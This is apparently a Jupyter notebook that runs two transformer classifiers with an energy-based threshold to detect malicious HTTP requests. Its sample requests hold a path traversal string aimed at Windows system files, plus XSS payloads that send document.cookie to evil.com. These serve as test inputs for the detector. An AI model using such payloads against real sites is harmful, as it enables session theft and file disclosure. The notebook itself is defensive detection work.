Loading Libraries


In [None]:
import torch
import numpy as np
import pandas as pd
from tqdm import tqdm
from pprint import pprint
from transformers import AutoTokenizer, AutoModelForSequenceClassification

If There is a dataset


In [None]:
# For developers
# Load dataset & View first 5 rows of the dataset
df = pd.read_csv("./path/to/dataset.csv", dtype=str)
df = df.fillna('""') # Fill Empty with ""
df.head()

Format Input


In [None]:
# For developers
df["value"] = df.apply(
    lambda row: f"""
    [METHOD] {row['method']} 
    [URL] {row['url']} 
    [COOKIE] {row['cookie']} 
    [BODY] {row['body']} 
    [HOST] {row['host']} 
    [USER_AGENT] {row['user_agent']} 
    [X_FORWARDED_FOR] {row['x_forwarded_for']} 
    [REFERER] {row['referer']} 
    [X_REQUESTED_WITH] {row['x_requested_with']} 
    [ACCEPT_LANG] {row['accept_language']} 
    [HTTP_VERSION] {row['http_version']}""",
    axis=1
)
pprint(df["value"][0])
# Formatted Input should that is value column of dataframe
# will have values something like this :
'''
[METHOD] PUT 
[URL] /contact?path=..%5c..%5c..%5csystem32%5cconfig%5csystem 
[COOKIE] ABC123; lang=en-IN
[BODY] {"values": ["?path=..%5c..%5c..%5csystem32%5cconfig%5csystem",]} 
[HOST] linkedinbackup.co [USER_AGENT] Mozilla/5.0 
[X_FORWARDED_FOR] "" 
[REFERER] "" 
[X_REQUESTED_WITH] "" 
[ACCEPT_LANG] tr;q=0.9 
[HTTP_VERSION] HTTP/1.1
'''

Sample Input recevied through API


In [None]:
# For End-User
# A example request that will be received through an API
sample_request = """
[METHOD] PUT 
[URL] /shell.php?search=<style>@keyframes 
[COOKIE] _rails_session=<script>WebSocket('ws://evil.com').send(document.cookie)</script>; _ga=<script>new Image().src='http://evil.com/?c='+document.cookie;</script> 
[BODY] data=?search=<style>@keyframes x{}</style><iframe style='animation-name:x' onanimationend='alert(1)'>&timestamp=1746479555 
[HOST] appletwitter.biz 
[PROTOCOL]  
[USER_AGENT] Mozilla/5.0 (Linux; Android 14; OnePlus 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36 
[ACCEPT] text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 
[ACCEPT_ENCODING] gzip, deflate, br 
[ACCEPT_LANGUAGE] es;q=0.9 
[CONTENT_TYPE] multipart/form-data 
[CONTENT_LENGTH]  
[CONNECTION] close 
[X_FORWARDED_FOR]  
[REFERER] 
"""

Load Binary Model


In [None]:
binary_model_dir = "./path/to/absolution_v1.0"
binary_model = AutoModelForSequenceClassification.from_pretrained(
    binary_model_dir,
    use_safetensors=True  # Explicitly load from .safetensors
)
binary_model_tokenizer = AutoTokenizer.from_pretrained(binary_model_dir)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
binary_model = binary_model.to(device)
binary_model.eval()

Load Multi Model


In [None]:
multi_model = AutoModelForSequenceClassification.from_pretrained("./path/to/absolution_v2.0").to(device)
multi_model = multi_model.to(device) # attaching to the same device
multi_model.eval()

Tokenise Input Function


In [None]:
# For Developers
def tokenize(inputs):
    return binary_model_tokenizer(
        inputs["value"], # Assuming value column is present similar to above example
        padding="max_length",
        truncation=True,
        max_length=512,
        return_tensors="pt"
    )

Map inputs to tokenise the dataset


In [None]:
# tokenized_datasets = {
# "test": dataset["test"].map(tokenize, batched=True),
# }
tokenized_datasets = []

Define Energies Based on a Labeled Dataset


In [None]:
def energy_score(logits, T=1):
    return -T * torch.logsumexp(logits / T, dim=1)

# Compute energy scores
val_energies = []
val_labels = []

# This is for enterprise to keep at backend and maintain
# Update it consistently with new inputs for intrusion detection of unknown malware
with torch.no_grad():
    for example in tqdm(tokenized_datasets["val"]):
        inputs = {
            "input_ids": torch.tensor([example["input_ids"]]).to(device),
            "attention_mask": torch.tensor([example["attention_mask"]]).to(device)
        }
        outputs = multi_model(**inputs)
        energy = energy_score(outputs.logits).item()
        val_energies.append(energy)
        val_labels.append(example["label"])

In [None]:
threshold = np.percentile(val_energies, 95)  # 95% of known attacks have energy less than input value
pprint(f"Optimal energy threshold: {threshold}")

Attack Detection Logic


In [None]:
# For Enterprise
def detect_attack(text, binary_model, multi_model, tokenizer, energy_threshold=-5, device="cuda"):
    # Move models to device
    binary_model = binary_model.to(device)
    multi_model = multi_model.to(device)
    
    # Tokenize input
    inputs = tokenizer(text, return_tensors="pt", truncation=True, max_length=512).to(device)
    
    # Get predictions from both models
    with torch.no_grad():
        binary_out = binary_model(**inputs)
        multi_out = multi_model(**inputs)
    
    # Process binary model output
    binary_probs = torch.softmax(binary_out.logits, dim=-1)
    binary_pred = torch.argmax(binary_probs).item()  # 0=benign, 1=malicious
    
    # Process multi-class model output
    multi_probs = torch.softmax(multi_out.logits, dim=-1)
    multi_pred_idx = torch.argmax(multi_probs).item()
    multi_pred_label = multi_model.config.id2label[multi_pred_idx]
    
    # Calculate energy score
    energy = energy_score(multi_out.logits).item()
    
    # Decision logic
    # Note : This can be updated at anytime in future
    final_label = "benign" 
    confidence = 1.0
    
    # Case 1: Both models agree on malicious (1 & 1)
    if binary_pred == 1 and multi_pred_label != "benign":
        final_label = multi_pred_label if energy <= energy_threshold else "unknown_malware"
        confidence = multi_probs[0][multi_pred_idx].item()
    
    # Case 2: Binary says malicious, multi says benign (1 & 0)
    elif binary_pred == 1 and multi_pred_label == "benign":
        final_label = "unknown_malware" if energy > energy_threshold else "benign"
        confidence = binary_probs[0][1].item()  # Binary's malicious confidence
    
    # Case 3: Binary says benign, multi says malicious (0 & 1)
    elif binary_pred == 0 and multi_pred_label != "benign":
        final_label = multi_pred_label  # Trust multi-class prediction
        confidence = multi_probs[0][multi_pred_idx].item()
    
    # Case 4: Both say benign but check OOD (0 & 0)
    else:
        if energy > energy_threshold:
            final_label = "unknown_malware"
            confidence = energy  # Use energy as confidence measure
        else:
            final_label = "benign"
            confidence = binary_probs[0][0].item() * multi_probs[0][0].item()  # Combined confidence
    
    return {
        "final_label": final_label,
        "confidence": confidence,
        "binary_score": binary_probs.cpu().detach().numpy()[0],
        "multi_scores": multi_probs.cpu().detach().numpy()[0],
        "energy_score": energy
    }

Threshold Guidance:

    Strict Security (Low FPR): energy_threshold = -3

    Balanced (Default): energy_threshold = -5

    High Sensitivity (Low FN): energy_threshold = -7


In [None]:
# For enterprise
energy_threshold = -4

result = detect_attack(
    text=sample_request,
    binary_model=binary_model,
    multi_model=multi_model,
    tokenizer=binary_model_tokenizer,
    energy_threshold=energy_threshold,  # Tuned threshold from validation
    # device="cuda" if torch.cuda.is_available() else "cpu"
)

# Formatted output with proper dictionary access
print(f"""
Final Classification: {result['final_label']}
Confidence: {result['confidence']:.2%}
Energy Score: {result['energy_score']:.2f}
Binary Probabilities: [Benign: {result['binary_score'][0]:.4f}, Malicious: {result['binary_score'][1]:.4f}]
Multi-Class Probabilities:""")

# Print multi-class probabilities with labels
for label, prob in zip(multi_model.config.id2label.values(), result['multi_scores']):
    print(f"  {label}: {prob:.4f}")

# Add OOD threshold reference
print(f"\nOOD Threshold: {energy_threshold} (Values above this indicate potential unknown attacks)")
